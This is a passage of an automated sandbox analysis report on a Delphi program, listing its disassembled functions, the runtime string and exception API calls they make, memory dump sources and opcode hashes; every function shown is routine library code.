                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Copy$qqrx20EnsureInternalString$qqrr20Stringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 983657741-0
                                                                                                  • Opcode ID: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                  • Instruction ID: 132a61221e42f68fe096f2f0703ce72c7c0d537a3ed7cef0da9aebb690a8ca7d
                                                                                                  • Opcode Fuzzy Hash: 74344b50583a924356235f014e24c58766c9e58c312ed4462f199f85a523a2ea
                                                                                                  • Instruction Fuzzy Hash: 6301B930A11399EFEB14DFA9DD529ADB3F8FF4A200BA04276E500D3111EB70DE41D691
                                                                                                  Function 50015834 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500158BE), ref: 50015874
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500158BE), ref: 50015891
                                                                                                  • @Sysutils@AnsiSameStr$qqrx20System@UnicodeStringt1.RTL120(?,00000000,500158BE), ref: 5001589C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiSystem@@$FromStr$qqrr20StringStringx27System@%T$us$i0$%$Copy$qqrx20InternalSameStr$qqrx20StringiiStringt1Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 379066412-0
                                                                                                  • Opcode ID: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                  • Instruction ID: 5f4c935dc7326f4b5ffd1e52cde991efdb19edfe8de5ec90e514678ba51a4583
                                                                                                  • Opcode Fuzzy Hash: c9586697ffbc2b73cdd91dbbcbba96766bafe00c22bacf04bf09434da6c89794
                                                                                                  • Instruction Fuzzy Hash: 15018030B00288EFEF01CFA8D99199EB7F9EF49300FA042B6E504E7245EB309E449651
                                                                                                  Function 5000D160 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                  • @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20InternalUtf8$qqrpcuipbui
                                                                                                  • String ID:
                                                                                                  • API String ID: 3779820642-0
                                                                                                  • Opcode ID: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                  • Instruction ID: e04ebdc101fc4bf289a004674db906102c3d27fd8c3307898635fa4b721bd642
                                                                                                  • Opcode Fuzzy Hash: 92ff47a1b225b4d742312c647edfc1f9fd4c817f481cd0b4d27eeb15f79c464d
                                                                                                  • Instruction Fuzzy Hash: A1017534611A85BFBB11CFB9D9B199AB7F9EF492007D04677E504D3601EA30EE01D660
                                                                                                  Function 5002B158 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B17B
                                                                                                  • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B189
                                                                                                    • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                    • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                  • @Sysutils@Supports$qqrx45System@%DelphiInterface$t17System@IInterface%rx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B199
                                                                                                  • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(00000000,5002B1CF,?,?,?,?,00000000), ref: 5002B1A8
                                                                                                  • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(5002B1D6,?,?,?,00000000), ref: 5002B1C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$DelphiInterface$t17System@%$Clear$qqrr45Interface%IntfObject@System@@$Interface$qqrrx5_$Entry$qqrrx5_InterfaceInterface%rx5_Supports$qqrx45Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3577717398-0
                                                                                                  • Opcode ID: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                  • Instruction ID: 3f1c98fecfe68b52bf16856e5ff3d398f0e3bde1a59a24ad800dfe1f19cdd018
                                                                                                  • Opcode Fuzzy Hash: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                  • Instruction Fuzzy Hash: 6CF0F9303062855BEB04EBA5FC7295AB3DECF99358BD14276A900C3303DA60DC254690
                                                                                                  Function 50008C34 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                    • Part of subcall function 500087FC: @System@@NewAnsiString$qqrius.RTL120(?,?,500056AE,00000000), ref: 50008821
                                                                                                    • Part of subcall function 500087FC: @System@Move$qqrpxvpvi.RTL120(00000000,?,500056AE,00000000), ref: 5000882D
                                                                                                    • Part of subcall function 500087FC: @System@@FreeMem$qqrpv.RTL120(500056AE,00000000), ref: 5000884F
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                    • Part of subcall function 5000925C: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                    • Part of subcall function 5000925C: @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                    • Part of subcall function 5000925C: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$AnsiClr$qqrpvLength$qqrvMove$qqrpxvpvi$Asg$qqrpvpxvFreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr27StringString$qqriusStringusSystem@%T$us$i0$%x20Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2086941991-0
                                                                                                  • Opcode ID: c11578e97b51d0ebb740e0e0c89a11e6e1b3a7aca5931f475eef3c08a106609f
                                                                                                  • Instruction ID: 70c44d853572e2918cefb12b18bb5fbd04c90bfbcf4b79bc5922f659862d1e0c
                                                                                                  • Opcode Fuzzy Hash: c11578e97b51d0ebb740e0e0c89a11e6e1b3a7aca5931f475eef3c08a106609f
                                                                                                  • Instruction Fuzzy Hash: 9E01D4347020904BFB18D759D8B0A2DB3F2BFD5201BA4836EE284CB359DAB19C0187A2
                                                                                                  Function 5002A914 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A99F,?,00000000), ref: 5002A940
                                                                                                    • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                    • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A99F,?,00000000), ref: 5002A962
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002A99F,?,00000000), ref: 5002A978
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5002A99F,?,00000000), ref: 5002A984
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Sysutils@Unicode$Exception@$bctr$qqrp20Recxi$Asg$qqrr20CharClassClassoCreate$qqrp17ErrorExcept$qqrvFormatFormat$qqrx20FromLen$qqrr20LoadMessageMessage$qqruiMetaRaiseRecpx14String$qqrp20StringpbiStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617757611-0
                                                                                                  • Opcode ID: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                  • Instruction ID: 9c2c5285b6efc6558c6871cf73d9fb702bd57b1419b1abeba3fe6d9365420b74
                                                                                                  • Opcode Fuzzy Hash: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                  • Instruction Fuzzy Hash: E201DB74A056869FD714CFA5FC809AEB7F9EB59300F51863AE900E3351DB309D40C7A1
                                                                                                  Function 500282B4 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 500282F2
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002830D
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002831B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3042977434-0
                                                                                                  • Opcode ID: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                  • Instruction ID: 47000205c57155a74c5d18828630aa859fd0bb08eddc99539042e8fa57d804a7
                                                                                                  • Opcode Fuzzy Hash: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                  • Instruction Fuzzy Hash: 6101DF34A131C6EFEB00DBA8E91289DB3FAEF94600BA182B2E50093614E7349F00D390
                                                                                                  Function 50028470 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120(00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 5002847E
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284AE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284C7
                                                                                                  • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284CF
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500284F5,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284E8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2156883435-0
                                                                                                  • Opcode ID: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                  • Instruction ID: 715662b57516d9754a6f786f41bd808451b406471416e7d906745c201c20a256
                                                                                                  • Opcode Fuzzy Hash: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                  • Instruction Fuzzy Hash: C801DF30A0618AEF9B10EFB1ED6286DB3F9FB4420079146B6E800D3251E738EE0097A0
                                                                                                  Function 5001D8E0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001D8EE
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001D956), ref: 5001D91B
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D956), ref: 5001D92E
                                                                                                  • @Sysutils@StrLCopy$qqrpcpxcui.RTL120(00000000,5001D956), ref: 5001D939
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5001D95D), ref: 5001D950
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Char$qqrx27Clr$qqrpvCopy$qqrpcpxcuiInternalRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 225901233-0
                                                                                                  • Opcode ID: e797eab4a70677fbd8b65bf4ea9112dab01743d87ce20a58422a53b87a9f2b62
                                                                                                  • Instruction ID: 6789688a35950e27e6b693cafdea5081acba6db0b001ad7a1da5a9f1fa3c46a1
                                                                                                  • Opcode Fuzzy Hash: e797eab4a70677fbd8b65bf4ea9112dab01743d87ce20a58422a53b87a9f2b62
                                                                                                  • Instruction Fuzzy Hash: 3E01A230700A85AFAB01DFB8EDA186EB3F9EB492407A04277E504D3254EB70DE42C790
                                                                                                  Function 5002E0E4 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002E0F3
                                                                                                  • GetCPInfo.KERNEL32(5002E1B0,?,00000000), ref: 5002E113
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002E1B0,?,00000000), ref: 5002E129
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002E1B0,?,00000000), ref: 5002E12E
                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120(5002E1B0,?,00000000), ref: 5002E146
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$AfterClassClassoConstruction$qqrp14Create$qqrp17Except$qqrvException@$bctr$qqrp20InfoMetaObjectRaiseStringSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2125405577-0
                                                                                                  • Opcode ID: 75e8563de8be2d28d6ec57e3352ae8178458ce8a71039ebcc560a7693fac316e
                                                                                                  • Instruction ID: e188588ab113c5b644c7c0773fcb92f3a1bc056ea3630c60d22f3d69e5b640df
                                                                                                  • Opcode Fuzzy Hash: 75e8563de8be2d28d6ec57e3352ae8178458ce8a71039ebcc560a7693fac316e
                                                                                                  • Instruction Fuzzy Hash: 3001A772A027C58FD720DFACED81996B7E8AF14660B00872AFD59C7741E631E91487E1
